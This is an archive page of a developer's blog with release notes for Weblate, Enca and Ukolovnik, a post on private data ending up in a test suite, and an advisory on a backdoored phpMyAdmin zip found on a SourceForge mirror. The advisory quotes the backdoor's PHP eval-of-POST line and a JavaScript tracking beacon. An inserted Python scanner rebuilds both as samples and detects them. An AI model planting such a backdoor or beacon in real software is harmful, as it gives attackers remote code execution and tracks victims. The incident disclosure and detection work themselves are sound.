Michal Čihař - Archives

Think twice before making your private data public

Data, once put on the internet, are quite hard to delete. You can most likely delete them (or ask for their deletion) from the place where they were originally distributed, but you can never be sure where else they have appeared.

Recently, I've seen several requests to remove some data from the Gammu test suite. This test suite was created using public data available in our bug tracker, simply so that we could verify that we won't break things which were fixed earlier.

It turns out that some people made public some very private stuff, which ended up included in the test suite. None of the developers had any clue about the content of these messages, as they were in a language none of us understands (and we were too lazy to run them through Google Translate to find out).

Of course we've removed the data on request, but it has probably already been copied to a dozen other places on the internet...

Compromised SourceForge mirror

Yesterday, the phpMyAdmin security team was notified about a backdoor being distributed together with the phpMyAdmin zip file on one of the SourceForge mirrors.

We quickly analyzed the issue and confirmed that the backdoor is indeed present in the phpMyAdmin-3.5.2.2-all-languages.zip file. It allowed anybody to execute arbitrary PHP code: there was a file called server_sync.php which simply called eval on the posted data:

<?php @eval($_POST['c']);?>

In addition to this, JavaScript code was included which could allow the attacker to track vulnerable installations:

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

All in all, it looks like a simple but quite effective way to install a backdoor, had they been able to spread it more widely. We immediately released PMASA-2012-5 to notify our users.
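An added defensive example (my own code, not from the original post or the phpMyAdmin project): a small scanner that walks an extracted download tree and flags the two indicators described above, a PHP file that passes request data to eval and an injected beacon pointing at the phpmyadmin-images.net domain. The sample files it checks are constructed inline from the snippets quoted in the post; the regex shapes and the inclusion of $_GET/$_REQUEST alongside $_POST are assumptions that generalize what the post shows.

```python
import os
import re
import tempfile

# Indicators from the post: eval of $_POST data and the beacon domain. The
# regex shapes and the extra $_GET/$_REQUEST variants are assumptions.
EVAL_REQUEST = re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST)\b")
BEACON_DOMAIN = re.compile(r"phpmyadmin-images\.net")


def scan_tree(root):
    """Walk root and return a sorted list of (relative path, indicator)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith((".php", ".js", ".html")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            rel = os.path.relpath(path, root)
            if EVAL_REQUEST.search(text):
                hits.append((rel, "eval-of-request-data"))
            if BEACON_DOMAIN.search(text):
                hits.append((rel, "tracking-beacon-domain"))
    return sorted(hits)


def build_sample_tree():
    """Construct a tiny sample tree: one harmless file plus the two planted
    files quoted in the post (constructed here, contents taken from the post)."""
    root = tempfile.mkdtemp(prefix="pma_scan_")
    samples = {
        "index.php": "<?php\necho 'hello';\n",
        "server_sync.php": "<?php @eval($_POST['c']);?>\n",
        "js/messages.js": (
            'icon = document.createElement("img");\n'
            'icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";\n'
        ),
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, indicator in scan_tree(build_sample_tree()):
        print(f"{indicator}: {rel}")
```

Point scan_tree at the directory where you unpacked a downloaded archive; an empty result on a clean tree, and exactly the planted files on the sample tree, is the expected outcome.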

Luckily this was spotted quite fast (judging by the domain used, the exploit could not have been live before 22nd September 2012) and not on a heavily used mirror (based on the official SourceForge statement, about 400 users downloaded the file with the backdoor).

What still remains unclear is whether this really targeted only phpMyAdmin, or whether there were more modified files on this mirror (SourceForge hosts thousands of projects). I randomly tried a few of our other download options from this mirror and none of them was affected, but the mirror was taken offline before I could do a more systematic analysis, so this question can now be answered only by SourceForge.

Enca 1.14

It seems I forgot to announce Enca 1.13 here, but I won't make the same mistake with 1.14, which was released today.

If you don't know Enca, it is an Extremely Naive Charset Analyser. It detects the character set and encoding of text files and can also convert them to other encodings using either a built-in converter or external libraries and tools like libiconv, librecode, or cstocs. Its code is currently available at Gitorious.

The full list of changes for the 1.14 release is short:

  • Allow standard names for the Belarusian and Slovenian languages, thanks to Branislav Geržo for the suggestion.
  • Reset strictness when the check buffer is smaller than the file size, thanks to Sam Liao.
  • Fixed typos in the man page, thanks to A. Costa.

Enca is still in maintenance mode only and I have no intention of writing new features. However, there is nothing stopping other contributors :-).

You can download it from http://cihar.com/software/enca/.

Weblate 1.2

Quite on schedule, Weblate 1.2 was released today. It comes with a lot of improvements, especially for project admins, in the handling of po files, and in performance.

Full list of changes for 1.2:

  • Weblate now uses South for database migration, please check the upgrade instructions if you are upgrading.
  • Fixed minor issues with linked git repos.
  • New introduction page for engaging people in translating using Weblate.
  • Added widgets which can be used for promoting translation projects.
  • Added option to reset repository to origin (for privileged users).
  • Project or subproject can now be locked for translations.
  • Possibility to disable some translations.
  • Configurable options for adding new translations.
  • Configuration of git commits per project.
  • Simple antispam protection.
  • Better layout of main page.
  • Support for automatically pushing changes on every commit.
  • Support for email notifications for translators.
  • List only used languages in preferences.
  • Improved handling of unknown languages when importing a project.
  • Support for locking a translation by a translator.
  • Optionally maintain the Language-Team header in the po file.
  • Include some statistics in the about page.
  • Supports (and requires) django-registration 0.8.
  • Caching of counted units with failing checks.
  • Checking of requirements during setup.
  • Documentation improvements.

You can find more information about Weblate on its website; the code is hosted on GitHub. If you are curious how it looks, you can try it out on the demo server. You can log in there with the demo account using the demo password, or register your own user. Ready-to-run appliances can be found in the SUSE Studio Gallery.

Weblate is also being used at https://l10n.cihar.com/ as the official translation service for phpMyAdmin, Gammu, Weblate itself and others.

If you are a free software project which would like to use Weblate, I'm happy to help you with the setup or even host Weblate for you (this will be decided case by case, as my hosting space is limited).

Update: The Weblate appliance has been updated to 1.2 as well.

Ukolovnik 1.4

The great effort of new translators finally forced me to release Ukolovnik 1.4. There are only minor bug fixes besides the translation updates.

Full list of changes:

  • New Spanish translation thanks to Matías Bellone.
  • New Portuguese translation thanks to Everton R.
  • New Chinese translation thanks to Siramizu.
  • New Danish translation thanks to Aputsiaq Niels Janussen.
  • Make it work without locales at all.

PS: I don't plan any further development of this tool; in fact I have not touched it in the last year and I don't expect this to change.

Weblate in numbers

About a month ago, I wrote that there had been over 20000 translations done using Weblate in three months. It looks like I was too pessimistic about the future, as in slightly more than a month l10n.cihar.com has reached 30000 translations.

This is quite a great achievement and shows a big user base, especially together with the rising number of third-party installations of Weblate (though some of the big ones still do not want to be mentioned).

On the other hand, around 100 issues have already been opened, most of which were fixed (the 1.2 release already includes 30 fixed issues). Still, I'm sure there is a lot of room for improvement :-).

Anyway, if you are looking for more numbers, you can find them on Ohloh :-).

Mailing list for Weblate

More and more people seem to be interested in Weblate and it is becoming less and less comfortable to handle all this communication privately in my mailbox.

That's why I've decided to open up a mailing list for Weblate. It is now available at weblate@lists.cihar.com; you can subscribe at https://lists.cihar.com/cgi-bin/mailman/listinfo/weblate (the request to add this list to Gmane is pending).

I hope this will attract more interested people and open up a wider discussion about some features.

PS: There is now also #weblate on freenode if you are interested in chatting about Weblate.

Weblate hacking #5

The last day of Hackweek VIII is over and I think Weblate is pretty much ready for the 1.2 release.

Today I continued analyzing performance and did a few optimizations of some frequently used code paths. There is still a lot of room for improvement, but I think Weblate is now fast enough for daily usage even on quite big projects.

The rest of the day was spent looking at various questions which people have asked me and distilling them into documentation. The most extended part was the frequently asked questions, which now include some hints for setup.

Of course the demo server is running the latest and greatest git version; I will probably push it soon to http://l10n.cihar.com/ as well.

Weblate hacking #4

The fourth day of Hackweek VIII was again mostly spent on Weblate for me. This time there are no nice new features, but rather general improvements to the code.

The first task was to add support for django-registration 0.8. Originally my plan was to support both 0.7 and 0.8, but that proved to be too complicated, so Weblate now requires 0.8, which brings quite a lot of differences in the API.

Later I installed django-debug-toolbar and looked at some bottlenecks in hot paths. This resulted in a few optimizations of translation merging and new caching for translation stats, which turned out to be too expensive to compute for bigger translations; caching them can save a few seconds on page load.

I will probably focus more on performance tuning tomorrow, as I don't plan to add any new features to the 1.2 release.